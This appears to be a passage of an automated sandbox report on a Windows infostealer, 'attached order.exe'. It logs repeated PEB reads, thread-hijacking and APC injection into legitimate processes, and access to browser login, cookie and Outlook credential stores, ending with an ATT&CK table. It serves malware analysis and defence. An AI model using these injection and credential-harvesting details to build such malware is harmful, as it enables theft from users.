                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0227 mov eax, dword ptr fs:[00000030h]3_2_017B0227
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0227 mov eax, dword ptr fs:[00000030h]3_2_017B0227
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0227 mov eax, dword ptr fs:[00000030h]3_2_017B0227
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A22B mov eax, dword ptr fs:[00000030h]3_2_0176A22B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A22B mov eax, dword ptr fs:[00000030h]3_2_0176A22B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A22B mov eax, dword ptr fs:[00000030h]3_2_0176A22B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172821B mov eax, dword ptr fs:[00000030h]3_2_0172821B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A200 mov eax, dword ptr fs:[00000030h]3_2_0172A200
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C2B0 mov ecx, dword ptr fs:[00000030h]3_2_0172C2B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017542AF mov eax, dword ptr fs:[00000030h]3_2_017542AF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017542AF mov eax, dword ptr fs:[00000030h]3_2_017542AF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE289 mov eax, dword ptr fs:[00000030h]3_2_017AE289
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174C560 mov eax, dword ptr fs:[00000030h]3_2_0174C560
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6550 mov eax, dword ptr fs:[00000030h]3_2_017C6550
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FA553 mov eax, dword ptr fs:[00000030h]3_2_017FA553
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E547 mov eax, dword ptr fs:[00000030h]3_2_0174E547
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01766540 mov eax, dword ptr fs:[00000030h]3_2_01766540
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768540 mov eax, dword ptr fs:[00000030h]3_2_01768540
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173254C mov eax, dword ptr fs:[00000030h]3_2_0173254C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772539 mov eax, dword ptr fs:[00000030h]3_2_01772539
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC51D mov eax, dword ptr fs:[00000030h]3_2_017BC51D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01732500 mov eax, dword ptr fs:[00000030h]3_2_01732500
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C50D mov eax, dword ptr fs:[00000030h]3_2_0176C50D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C50D mov eax, dword ptr fs:[00000030h]3_2_0176C50D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC5FC mov eax, dword ptr fs:[00000030h]3_2_017BC5FC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A5E7 mov ebx, dword ptr fs:[00000030h]3_2_0176A5E7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A5E7 mov eax, dword ptr fs:[00000030h]3_2_0176A5E7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017665D0 mov eax, dword ptr fs:[00000030h]3_2_017665D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C5C6 mov eax, dword ptr fs:[00000030h]3_2_0176C5C6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B05C6 mov eax, dword ptr fs:[00000030h]3_2_017B05C6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017345B0 mov eax, dword ptr fs:[00000030h]3_2_017345B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017345B0 mov eax, dword ptr fs:[00000030h]3_2_017345B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B85AA mov eax, dword ptr fs:[00000030h]3_2_017B85AA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762594 mov eax, dword ptr fs:[00000030h]3_2_01762594
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC592 mov eax, dword ptr fs:[00000030h]3_2_017BC592
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE588 mov eax, dword ptr fs:[00000030h]3_2_017AE588
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE588 mov eax, dword ptr fs:[00000030h]3_2_017AE588
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A580 mov eax, dword ptr fs:[00000030h]3_2_0176A580
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A580 mov eax, dword ptr fs:[00000030h]3_2_0176A580
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738470 mov eax, dword ptr fs:[00000030h]3_2_01738470
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738470 mov eax, dword ptr fs:[00000030h]3_2_01738470
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE461 mov eax, dword ptr fs:[00000030h]3_2_017BE461
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FA464 mov eax, dword ptr fs:[00000030h]3_2_017FA464
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0443 mov eax, dword ptr fs:[00000030h]3_2_017B0443
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6400 mov eax, dword ptr fs:[00000030h]3_2_017C6400
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6400 mov eax, dword ptr fs:[00000030h]3_2_017C6400
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172640D mov eax, dword ptr fs:[00000030h]3_2_0172640D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017364F0 mov eax, dword ptr fs:[00000030h]3_2_017364F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A4F0 mov eax, dword ptr fs:[00000030h]3_2_0176A4F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A4F0 mov eax, dword ptr fs:[00000030h]3_2_0176A4F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE4F2 mov eax, dword ptr fs:[00000030h]3_2_017BE4F2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE4F2 mov eax, dword ptr fs:[00000030h]3_2_017BE4F2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E4EF mov eax, dword ptr fs:[00000030h]3_2_0176E4EF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E4EF mov eax, dword ptr fs:[00000030h]3_2_0176E4EF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017544D1 mov eax, dword ptr fs:[00000030h]3_2_017544D1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017544D1 mov eax, dword ptr fs:[00000030h]3_2_017544D1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C84BB mov eax, dword ptr fs:[00000030h]3_2_017C84BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E4BC mov eax, dword ptr fs:[00000030h]3_2_0176E4BC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017324A2 mov eax, dword ptr fs:[00000030h]3_2_017324A2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017324A2 mov ecx, dword ptr fs:[00000030h]3_2_017324A2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017644A8 mov eax, dword ptr fs:[00000030h]3_2_017644A8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC490 mov eax, dword ptr fs:[00000030h]3_2_017BC490
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730485 mov ecx, dword ptr fs:[00000030h]3_2_01730485
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176648A mov eax, dword ptr fs:[00000030h]3_2_0176648A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176648A mov eax, dword ptr fs:[00000030h]3_2_0176648A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176648A mov eax, dword ptr fs:[00000030h]3_2_0176648A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760774 mov eax, dword ptr fs:[00000030h]3_2_01760774
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734779 mov eax, dword ptr fs:[00000030h]3_2_01734779
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734779 mov eax, dword ptr fs:[00000030h]3_2_01734779
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01742760 mov ecx, dword ptr fs:[00000030h]3_2_01742760
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov ecx, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750D01 mov eax, dword ptr fs:[00000030h]3_2_01750D01
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C8D0A mov eax, dword ptr fs:[00000030h]3_2_017C8D0A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCD00 mov eax, dword ptr fs:[00000030h]3_2_017BCD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCD00 mov eax, dword ptr fs:[00000030h]3_2_017BCD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172EDFA mov eax, dword ptr fs:[00000030h]3_2_0172EDFA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FCDEB mov eax, dword ptr fs:[00000030h]3_2_017FCDEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FCDEB mov eax, dword ptr fs:[00000030h]3_2_017FCDEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017EADD6 mov eax, dword ptr fs:[00000030h]3_2_017EADD6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017EADD6 mov eax, dword ptr fs:[00000030h]3_2_017EADD6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728DCD mov eax, dword ptr fs:[00000030h]3_2_01728DCD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762DBC mov eax, dword ptr fs:[00000030h]3_2_01762DBC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762DBC mov ecx, dword ptr fs:[00000030h]3_2_01762DBC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804D4B mov eax, dword ptr fs:[00000030h]3_2_01804D4B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01726DA6 mov eax, dword ptr fs:[00000030h]3_2_01726DA6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736D91 mov eax, dword ptr fs:[00000030h]3_2_01736D91
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CD8A mov eax, dword ptr fs:[00000030h]3_2_0172CD8A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CD8A mov eax, dword ptr fs:[00000030h]3_2_0172CD8A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C79 mov eax, dword ptr fs:[00000030h]3_2_01730C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C79 mov eax, dword ptr fs:[00000030h]3_2_01730C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C79 mov eax, dword ptr fs:[00000030h]3_2_01730C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CC68 mov eax, dword ptr fs:[00000030h]3_2_0172CC68
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01764C3D mov eax, dword ptr fs:[00000030h]3_2_01764C3D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728C3D mov eax, dword ptr fs:[00000030h]3_2_01728C3D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804CD2 mov eax, dword ptr fs:[00000030h]3_2_01804CD2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC20 mov eax, dword ptr fs:[00000030h]3_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC20 mov eax, dword ptr fs:[00000030h]3_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC20 mov eax, dword ptr fs:[00000030h]3_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\attached order.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\attached order.exe; NtSetContextThread: Indirect: 0x12836B9
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtQuerySystemInformation: Direct from: 0x36094FA
                      Source: C:\Users\user\Desktop\attached order.exe; NtSuspendThread: Indirect: 0x12839D9
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDeviceIoControlFile: Direct from: 0x360244A
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDeviceIoControlFile: Direct from: 0x360248E
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDelayExecution: Direct from: 0x360018B
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtProtectVirtualMemory: Direct from: 0x7FF82C082651
                      Source: C:\Users\user\Desktop\attached order.exe; NtResumeThread: Indirect: 0x1283CF9
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtQueryInformationToken: Direct from: 0x3601D4F
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtClose: Direct from: 0x7FFFFE699E7F
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtClose: Direct from: 0x36096DF
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtProtectVirtualMemory: Direct from: 0x56E2132
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDelayExecution: Direct from: 0x56DA4CB
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtAllocateVirtualMemory: Direct from: 0x360D286
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDeviceIoControlFile: Direct from: 0x360241B
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDelayExecution: Direct from: 0x36015E2
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDeviceIoControlFile: Direct from: 0x36095A9
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDeviceIoControlFile: Direct from: 0x3609651
                      Source: C:\Users\user\Desktop\attached order.exe; NtClose: Indirect: 0x127F542
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtResumeThread: Direct from: 0x56DA53C
                      Source: C:\Users\user\Desktop\attached order.exe; NtQueueApcThread: Indirect: 0x127F4BD
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDelayExecution: Direct from: 0x3602356
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtDelayExecution: Direct from: 0x56DA305
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtProtectVirtualMemory: Direct from: 0x360945E
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtProtectVirtualMemory: Direct from: 0x360AAD4
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; NtCreateThreadEx: Direct from: 0x36009E2
                      Source: C:\Users\user\Desktop\attached order.exe; Memory written: C:\Users\user\Desktop\attached order.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\attached order.exe; Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\attached order.exe; Section loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\cacls.exe; Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
                      Source: C:\Windows\SysWOW64\cacls.exe; Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\cacls.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\cacls.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\attached order.exe; Thread register set: target process: 7176
                      Source: C:\Windows\SysWOW64\cacls.exe; Thread register set: target process: 7176
                      Source: C:\Windows\SysWOW64\cacls.exe; Thread register set: target process: 7932
                      Source: C:\Users\user\Desktop\attached order.exe; Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                      Source: C:\Users\user\Desktop\attached order.exe; Process created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Users\user\Desktop\attached order.exe; Process created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                      Source: C:\Windows\SysWOW64\cacls.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: 6Program ManagerI
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Users\user\Desktop\attached order.exe VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\attached order.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\cacls.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\cacls.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Services File Permissions Weakness | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
